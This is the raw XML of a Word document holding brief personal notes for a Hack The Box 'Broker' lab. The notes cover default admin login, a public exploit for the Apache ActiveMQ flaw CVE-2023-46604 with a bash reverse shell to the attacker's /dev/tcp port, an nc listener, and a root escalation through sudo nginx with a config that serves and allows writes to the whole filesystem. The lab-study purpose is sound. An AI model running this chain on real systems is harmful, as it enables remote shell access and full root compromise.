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CB71" w14:textId="7BC94E7F" w:rsidR="00A60942" w:rsidRDefault="00A60942" w:rsidP="000F2F86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  <w:r w:rsidRPr="00A60942">
        <w:rPr>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="111927"/>
        </w:rPr>
        <w:t>https://threatninja.net/2023/11/hack-the-box-broker-machine-walkthrough-easy-difficulty/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46CF5C65" w14:textId="77777777" w:rsidR="00A60942" w:rsidRDefault="00A60942" w:rsidP="000F2F86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</w:p>
    <w:p w14:paraId="7C7AAFBE" w14:textId="3221693F" w:rsidR="00A57B30" w:rsidRPr="000F2F86" w:rsidRDefault="00654761" w:rsidP="000F2F86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  <w:r w:rsidRPr="000F2F86">
        <w:rPr>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="111927"/>
        </w:rPr>
        <w:t>10.10.11.243</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ED6610C" w14:textId="4D21C5B8" w:rsidR="00654761" w:rsidRPr="000F2F86" w:rsidRDefault="00654761" w:rsidP="000F2F86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  <w:r w:rsidRPr="000F2F86">
        <w:rPr>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="111927"/>
        </w:rPr>
        <w:t xml:space="preserve">/etc/host </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23AB039B" w14:textId="6DCE74A0" w:rsidR="00654761" w:rsidRPr="000F2F86" w:rsidRDefault="00654761" w:rsidP="000F2F86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  <w:r w:rsidRPr="000F2F86">
        <w:rPr>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="111927"/>
        </w:rPr>
        <w:t>Add Brocker</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AF32A02" w14:textId="5063CFF3" w:rsidR="007B1BF0" w:rsidRDefault="000F2F86" w:rsidP="007B1BF0">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
        <w:rPr>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="111927"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000F2F86">
        <w:rPr>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="111927"/>
        </w:rPr>
        <w:t>Login browser with default password admin admin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AC9B42F" w14:textId="5E152B36" w:rsidR="004036A0" w:rsidRDefault="00D06E24" w:rsidP="00403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hyperlink r:id="rId4" w:history="1">
        <w:r w:rsidRPr="00313584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https://github.com/SaumyajeetDas/CVE-2023-46604-RCE-Reverse-Shell-Apache-ActiveMQ.git</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="149CCB59" w14:textId="4209D1CB" w:rsidR="00D06E24" w:rsidRDefault="00D06E24" w:rsidP="00403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14:paraId="0DC2367C" w14:textId="650FD4C6" w:rsidR="00D06E24" w:rsidRDefault="00A90B62" w:rsidP="00403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edit </w:t>
      </w:r>
      <w:r w:rsidR="00D06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file </w:t>
      </w:r>
      <w:r w:rsidR="00AE020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</w:t>
      </w:r>
      <w:r w:rsidR="00D06E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oc_linux.xml</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B62AF16" w14:textId="03E39BD7" w:rsidR="00A90B62" w:rsidRDefault="00A90B62" w:rsidP="00403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14:paraId="2F83BBE9" w14:textId="066CCEC7" w:rsidR="001B6D9F" w:rsidRDefault="00A90B62" w:rsidP="001B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change sh to bash and add revers shell command</w:t>
      </w:r>
      <w:r w:rsidR="00B9021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with HTML encode</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="140975AB" w14:textId="75A0A917" w:rsidR="007F3D2C" w:rsidRPr="001B6D9F" w:rsidRDefault="007F3D2C" w:rsidP="001B6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F3D2C">
        <w:t>bash -i &amp;#x26;&amp;#x3E;/dev/tcp/10.10.14.147/1337 &amp;#x3C;&amp;#x26;1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="427390C1" w14:textId="66852310" w:rsidR="00132AEA" w:rsidRDefault="00132AEA"/>
    <w:p w14:paraId="1C9F0CAF" w14:textId="7F59A2BF" w:rsidR="00132AEA" w:rsidRDefault="00132AEA">
      <w:r w:rsidRPr="00132AEA">
        <w:t>python3 -m http.server 8005</w:t>
      </w:r>
      <w:r w:rsidR="009110D9">
        <w:t xml:space="preserve"> (in one terminal for connection for remote pc)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21177C94" w14:textId="290D7771" w:rsidR="00A67345" w:rsidRDefault="00A67345">
      <w:r>
        <w:t>nc -lvnp 1337 (one terminal for listen for rversshell)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="325B5BD6" w14:textId="38E8DF9E" w:rsidR="00132AEA" w:rsidRDefault="00E333DF">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E333DF">
        <w:t>go run main.go -i 10.10.11.243 -p 61616 -</w:t>
      </w:r>
      <w:r w:rsidRPr="00A67345">
        <w:t xml:space="preserve">u </w:t>
      </w:r>
      <w:hyperlink r:id="rId5" w:history="1">
        <w:r w:rsidR="00F7263E" w:rsidRPr="00A67345">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:u w:val="none"/>
          </w:rPr>
          <w:t>http://10.10.14.147:8005/poc-linux.xml</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00A67345" w:rsidRPr="00A67345">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">      (</w:t>
      </w:r>
      <w:r w:rsidR="00A67345">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>one terminal for push to target pc)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58D790C1" w14:textId="1061F4EA" w:rsidR="00BC7E52" w:rsidRDefault="00BC7E5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usr/bin/nginx  is vulnerable </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18FD7453" w14:textId="68D6ADBF" w:rsidR="00775FF1" w:rsidRDefault="00775FF1">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>create configuration nginx.conf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="786AA733" w14:textId="77777777" w:rsidR="00775FF1" w:rsidRDefault="00775FF1" w:rsidP="00775FF1">
      <w:r>
        <w:t>user root;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E9D50C8" w14:textId="77777777" w:rsidR="00775FF1" w:rsidRDefault="00775FF1" w:rsidP="00775FF1">
      <w:r>
        <w:t>worker_processes auto;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6430C8DE" w14:textId="77777777" w:rsidR="00775FF1" w:rsidRDefault="00775FF1" w:rsidP="00775FF1">
      <w:r>
        <w:t>events {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E96E00A" w14:textId="77777777" w:rsidR="00775FF1" w:rsidRDefault="00775FF1" w:rsidP="00775FF1">
      <w:r>
        <w:t xml:space="preserve">        worker_connections 1024;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D1DAEFB" w14:textId="77777777" w:rsidR="00775FF1" w:rsidRDefault="00775FF1" w:rsidP="00775FF1">
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36CEBABC" w14:textId="77777777" w:rsidR="00775FF1" w:rsidRDefault="00775FF1" w:rsidP="00775FF1">
      <w:r>
        <w:t>http {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33DE9930" w14:textId="77777777" w:rsidR="00775FF1" w:rsidRDefault="00775FF1" w:rsidP="00775FF1">
      <w:r>
        <w:t xml:space="preserve">     server {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DA78693" w14:textId="77777777" w:rsidR="00775FF1" w:rsidRDefault="00775FF1" w:rsidP="00775FF1">
      <w:r>
        <w:t xml:space="preserve">           listen 7777;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EE2A1D3" w14:textId="77777777" w:rsidR="00775FF1" w:rsidRDefault="00775FF1" w:rsidP="00775FF1">
      <w:r>
        <w:t xml:space="preserve">           root /;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7766EF32" w14:textId="77777777" w:rsidR="00775FF1" w:rsidRDefault="00775FF1" w:rsidP="00775FF1">
      <w:r>
        <w:t xml:space="preserve">           autoindex on;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42F33F4F" w14:textId="77777777" w:rsidR="00775FF1" w:rsidRDefault="00775FF1" w:rsidP="00775FF1">
      <w:r>
        <w:t xml:space="preserve">           dav_methods PUT;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08D09424" w14:textId="77777777" w:rsidR="00775FF1" w:rsidRDefault="00775FF1" w:rsidP="00775FF1">
      <w:r>
        <w:t xml:space="preserve">     }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7953AE27" w14:textId="76AE9559" w:rsidR="00484822" w:rsidRDefault="00775FF1" w:rsidP="00775FF1">
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14DF5C42" w14:textId="247320CD" w:rsidR="008417A2" w:rsidRDefault="00D758F4">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>/dev/shm</w:t>
      </w:r>
      <w:r w:rsidR="00755E0E">
        <w:t xml:space="preserve">  (run the nginx.conf in this folder)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E937F92" w14:textId="71E1AA35" w:rsidR="004A489D" w:rsidRDefault="004A489D" w:rsidP="004A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89D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>sudo nginx -c /dev/shm/nginx.conf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="794BB8D9" w14:textId="68FF57F0" w:rsidR="008D5FA0" w:rsidRDefault="008D5FA0" w:rsidP="004A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D7CD0" w14:textId="55ABAEF3" w:rsidR="008D5FA0" w:rsidRDefault="008D5FA0" w:rsidP="004A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open browser with nginx port</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36637612" w14:textId="1AD68C54" w:rsidR="008D5FA0" w:rsidRPr="004A489D" w:rsidRDefault="008D5FA0" w:rsidP="004A4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10.10.11.243:7777</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48587F51" w14:textId="77777777" w:rsidR="004A489D" w:rsidRDefault="004A489D"/>
    <w:sectPr w:rsidR="004A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94"/>
    <w:rsid w:val="000F2F86"/>
    <w:rsid w:val="00132AEA"/>
    <w:rsid w:val="001B6D9F"/>
    <w:rsid w:val="004036A0"/>
    <w:rsid w:val="00484822"/>
    <w:rsid w:val="004A489D"/>
    <w:rsid w:val="00542B14"/>
    <w:rsid w:val="00654761"/>
    <w:rsid w:val="006B1CA0"/>
    <w:rsid w:val="00755E0E"/>
    <w:rsid w:val="00775FF1"/>
    <w:rsid w:val="007B1BF0"/>
    <w:rsid w:val="007F3D2C"/>
    <w:rsid w:val="008417A2"/>
    <w:rsid w:val="008D5FA0"/>
    <w:rsid w:val="009110D9"/>
    <w:rsid w:val="00A57B30"/>
    <w:rsid w:val="00A60942"/>
    <w:rsid w:val="00A67345"/>
    <w:rsid w:val="00A90B62"/>
    <w:rsid w:val="00AE0201"/>
    <w:rsid w:val="00B40294"/>
    <w:rsid w:val="00B90214"/>
    <w:rsid w:val="00BC7E52"/>
    <w:rsid w:val="00C92530"/>
    <w:rsid w:val="00D06E24"/>
    <w:rsid w:val="00D758F4"/>
    <w:rsid w:val="00E333DF"/>
    <w:rsid w:val="00F2409E"/>
    <w:rsid w:val="00F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FB0"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{944DEDE6-8249-4808-B840-00635E22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9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F2F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2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03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14.147:8005/poc-linux.xml" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/SaumyajeetDas/CVE-2023-46604-RCE-Reverse-Shell-Apache-ActiveMQ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2023-12-14T15:48:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-12-15T17:33:00Z</dcterms:modified>
</cp:coreProperties>
</file>